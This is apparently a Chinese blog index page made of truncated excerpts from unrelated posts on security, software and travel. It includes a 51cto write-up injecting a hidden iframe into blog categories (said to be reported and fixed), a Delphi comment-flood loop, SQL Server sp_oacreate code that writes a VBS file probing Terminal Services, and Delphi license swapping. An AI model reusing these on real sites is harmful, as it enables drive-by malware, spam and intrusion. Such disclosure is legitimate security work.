sally

    51cto.com是我常去的一个网站，最近找了点时间对它进行了一次比较严格的黑盒安全检测，发现了几个小问题，正所谓“攻易守难”，连51CTO这个国内最大的网络技术网站，也不免存在一些安全方面的问题。
 
    大体先把51cto网站结构介绍一下：网站由新闻发布管理系统、blog系统、招聘系统、论坛、技术圈等模块组成，新闻发布管理系统是php+mysql结构，blog系统使用的是phpwind blog 4.3.2，可能在原有的基础上做了很多功能改动。招聘系统也是php+mysql结构，应该是自己开发的，论坛是DZ定制的，..

软件名称:picasa

    软件性质:免费软件

    最新版本:3.5

    文件大小:8.97MB

    运行环境：Windows XP/Vista/7

    下载地址:http://dl.google.com/picasa/picasa35-setup.exe
现在，拍照手机、数码相机几乎达到了人手一部，用镜头记录生活的人也越来越多。不过，拍照的时间一久，可能你很难记得某张相片到底是何年何月拍摄的。因此，如果用户想很快地找到它，必须借助于专门的相片管理软件。

    早期的相片管理软件，..

 

去年有幸去江西参观考察，去了南昌，庐山，井冈山，唯一的遗憾是没有时间去南昌的浑圆山庄，去拜访王老师和各位师兄，向他们请教学习。下面的照片大部分是昆虫和动物的，献给和我一样喜欢猫猫狗狗的人吧。

 
中午的午餐，石蛙，小银鱼（好像是这么叫的）等

 
 
甜蜜的一对，不久公螳螂就要被母螳螂吃掉了，想起小时候家里的螳螂卵包了n多小螳螂，一蹦一跳的。

 
 
竹节虫吧，我第一次见

 
 

第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
　　而终端所对应的服务名为：TermService
第二步：用netstat -ano命令，列出所有端口对应的PID值!
　　找到PID值所对应的端口
同样，找Serv-U，radmin，等端口都适用!

我知道用delphi的方法将文件变成流写到字段读时先用ADOBLOB属性读入字段值再写入临时目录的生成临时文件即可。
---------------------------------------------------------------

1、建立过程

CREATE PROCEDURE sp_textcopy ( 
  @srvname    varchar (30), 
  @login      varchar (30), 
  @password    varchar (30), 
  @dbname   &..

安装前提是你已经下载了Delphi 2007 for Win32的ISO。
　　Delphi 2007安装程序根据不同的序列号(许可文件)来判断安装版本，一般ISO中自带的许可文件是专业版的。
　　企业版和专业版的许可文件下载：delphi2007_slip.zip
　　C++ Builder 2007的企业版许可文件(slip file for C++ Builder 2007)：cb2007_ent.zip
　　新装方法：
　　1、下载D2007。
　　2、删除D2007中的delphi2007.slip文件，将这里下载的d2007_Ent.slip直接拷入目录内(建议使用UltraISO编辑镜像)。
　　3、完成后就可以运行setup.exe文件开始安装了！安装过..

新闻来源:Engadget

作者Nick Greenlee制作了一个的视觉短片，其中两位用户的Mac 与PC 分别幻化成变形金刚，来了一场终极PK，欲知后事且看跳转分解......

两位用户正在因为手中的机器打口水仗，谁知这时PC先忍不住了，化出原形。看着PC威胁自己的主人，MAC也忍不住变了过来。最近打算去阳澄湖旅游去。




第一招，MAC来了个老鹰掐小鸡，MAC胜。第二式，MAC剑术略胜一筹，正要终结PC时，PC用了个下三烂的招式，打掉MAC蛋蛋两颗（我晕..），并 卸掉MAC胳膊一只。MAC见况不妙，来了个回身扫腿，转身就跑，并找了几名G5做帮手，PC的..

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\a.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Dim ReadComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ReadComputerName=WScript.CreateObject("WScript.Shell")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Dim TSName,TSRegPath'
exec @ret = sp_oamethod @f, 'writeline', NULL,'TSRegPath="HKLM\System\CurrentControlSet\Control\..

控件
 smtp: TIdSMTP;
 MgeSend: TIdMessage;
代码
procedure TForm1.Button1Click(Sender: TObject);
begin
  SMTP.Host:='smtp.163.com';
  smtp.Username:='zhm001x@163.com';
  smtp.Password:='paswrd';
  smtp.Port:=25;
  smtp.Connect();
  MgeSend.Recipients.EMailAddresses:='zhm001x@qq.com';
  MgeSend.From.Text :='zhm001x@163.com';
  MgeSend.Subject:='test';
  MgeSend.Body.Text:='发邮件测试';
  ..

现在各大门户网站基本都有自己的blog系统，但有不少存在漏洞，本文就以51cto的blog为例，向大家介绍该如何发现和利用漏洞。在发布本文前已经通知了相关人员，漏洞已经补上了。
51cto的blog系统功能很强大，可自定义很多设置，同时也带来了一些安全隐患。在blog系统后台的“文章管理”栏目的“我的文章分类”中，可以添加文章分类，尽管开发者对文章分类的字数有所限制，但只是在客户端进行了鉴别，我们可以想办法通过achilles这款软件抓包后，对数据包进行修改，加入我们要加的代码，如图1所示。

图1
其中666666是我正常提交的文章分类字符，我们将其改为<iframe src="[url]http://www.itheroes.cn[/url]" width=0></iframe>，然后再提交。然后再浏览我的blog首页sally.blog.51cto.com，你会发现在打开blog的同时也在打开[url]www.itheroes.cn[/url]这个网站，如图2所示。

图2
blog后台的文章分类也变成了图3的形式。

现在破坏者可以给挂了木马的blog起个媚俗的名字，好奇者访问了。[/img]..

前不久在学习delphi，因为在做系统维护时经常接触到流氓软件，所以对流氓软件的功能实现有了兴趣，决定通过实践，看看流氓软件的部分功能都是如何实现的。经过一段时间的测试，做了一个极其简单的小软件，软件运行后除了会将自己复制到某些特定的文件夹中，还会自动在后台监视盘符变化，一旦有u盘或者移动硬盘接到计算机上，软件会自动将自身复制到u盘或者移动硬盘的第一个分区上，还可以在制定时间进行一些操作，由于危害比较大，就不贴出来了。因为学delphi时间不长，也就一个月左右，可能有些地方的代码处理的不够简洁，也希望得到..

去年在对一些网站做安全检测时发现不少blog系统存在评论漏洞，破坏者可以通过自制工具达到疯狂发评论的目的，本文就以51cto的blog系统为例吧，希望blog开发者可根据此文找出解决问题的办法（好像已经加验证码了）。
 
首先我们先来抓包，抓http数据包的软件很多，这里使用的是Achilles，抓到的信息如图1：

图1
 
其中authnum=&tid=107858&username=sally&content=%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E6%BC%8F%E6%B4%9E&niming=0是关键数据，
107858是blog的文章号，%E6%B5%8B%E8%AF%95%E4%B8%80%E4%B8%8B%E6%BC%8F%E6%B4%9E是汉字编码（不知道这样描述对不对），翻译过来的意思是“测试一下漏洞”，也就是评论的内容，得到这些后就可以到delphi中写代码了：
  var
  i:integer;
  strurl:string;
  begin
  for i:=800 to 9000 do
  begin
  sleep(8000);
  StrUrl:='http://blog.51cto.com/comment.php?&tid='+Trim(inttostr(i))+'&content=评论的汉字编码&submit=%CC%E1+%BD%BB';
  ShellExecute(0,'open',pchar(StrUrl),nil,nil,SW_SHOW);
  end;
 
sleep(8000)为停顿8秒，i为文章编号，程序编译后就会每格8秒钟就会通过ie向指定的文章提交评论。
 
防范评论灌水机的方法也很简单，加验证码，屏蔽在短时间内大量发送同一内容评论的id和ip。[/img]..

如果本文你看不懂，你可以直接看文章最后的彩色字部分。
BIOS，完整地说应该是ROM－BIOS，是只读存储器基本输入／输出系统的缩写，它实际上是被固化到微机主板ROM芯片上的一组程序，主要保存着有关微机系统最重要的基本输入输出程序，系统信息设置、开机上电自检程序和系统启动程序等；为计算机提供最低级的、最直接的硬件控制。准确地说，BIOS是硬件与软件程序之间的一个“转换器”或者说是接口(虽然它本身也只是一个程序)，负责解决硬件的即时需求，并按软件对硬件的操作要求具体执行。 BIOS ROM 芯片不但可以在主板上看到，而且BIO..

1、安装虚拟机，网络连接方式选择“桥接”

2、在VMware菜单里，选择“编辑”---“虚拟网络设置”---“主机虚拟网络映射”---“VMnet0”，

选择一个真实的网络适配器进行桥接（不要自动选择）

3、在真实主机上，“网上邻居”右键属性，找到上一步选择的网络适配器相应的网络连接，更改其IP地址为“192.168.0.1”，子网掩码“255.255.255.0”，其他为空即可

4、在虚拟机上更改本地连接的IP地址为“192.168.0.2”，子网掩码“255.255.255.0”，，网关“192.168.0.1”，DNS服务器“202.102.224.68”

5、在主机上将用来上互联网的..

点击“开始/运行”，在“运行”对话框中输入“regedit”打开注册表编辑器，定位到“HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\policies\Ratings”分支，这时就可以发现一个名为“KEY”的键值项，这就是已经过加密的分级审查密码，我们只需将它删除即可。重新启动电脑之后，你可以重新设置分级审查密码。打开IE浏览器，点击“工具 /Internet选项”菜单，会打开“Internet 选项”对话框，点击“内容/分级审查”，你会发现分级审查口令已经被复位了，现在你只要输入新的分级审查口令即可。当然直接删除“Ratings”..

本文原创：linr@cncert.net 请转载时保留版权信息
相信大多数朋友都是iframe木马的受害者，有朋友的网站被注入了N回iframe，心情可想而知。而且现在ARP攻击，注入iframe也是轻而易举的事，仅局域网里都时刻面临威胁，哎，什么世道。


灵儿曾经在经典论坛上发过贴子：《一行代码解决网站防挂IFRAME木马方案》[url]http://bbs.blueidea.com/thread-2785512-1-1.html[/url] ，有不少朋友都联系了灵儿，有的表示感谢，不过更多的是疑问了，今天把原理细细地讲一下吧：

IE Only——一般只有IE害怕iframe这样的挂马,所以灵..

 

 

 

 

烟台海边掀起腾空巨浪



　　胶东在线网1月12日讯(记者 杨胜武)受冷空气影响，烟台附近海面的最高风力达11级，大风掀起层层巨浪，咆哮着扑向岸边，气势壮观。
放眼望去，海鸥点点，海浪翻滚，一道道白线汹涌而来，夹裹着海沫扑向岸边，遇到挡浪坝的阻隔，掀起腾空的巨浪，洒向路面。沿着滨海路，从烟台山向东，人行横道上已有大量积水，岸边铁链上也布满冰挂。
　　据烟台市气象局12日上午11时发布的天气预报，烟台海域12日白天到夜间，东北风8-9级，阵风11级，半夜减弱为7-8级，巨浪巨涌。13日白天，东北风7-8级，大浪大涌。
　　烟台市海上搜救中心、烟台市海上防风暴潮指挥部要求各涉海力量继续保持海上特大风险红色戒备。目前，烟台港区有79艘商业船只在停泊避风；辖区所有客运船舶仍然停航，预计烟台至大连航线客运船舶将于13日凌晨时分逐渐恢复营运。
       最近打算去上海度假去。

    计算机中毒后往往会把杀毒软件和安全工具关闭或者禁止它们运行。要使杀毒软件和安全工具运行起来，必须将后台运行的病毒进程关闭掉，下面就介绍几种方法：
1、进入安全模式尝试开启杀毒软件和安全工具，如果无法运行，将杀软和安全工具改名，比如将rising.exe修改为a.com或者a.scr，看是否可以运行。
2、如果不行，看看msconfig和服务是否能打开，如果能打开，把可疑进程和可疑服务取消和关闭掉，重新启动。
3、如果上面的方法不行，使用任务管理器，找到可疑进程，在进程上点右键，选择“结束进程树”，这样可以防..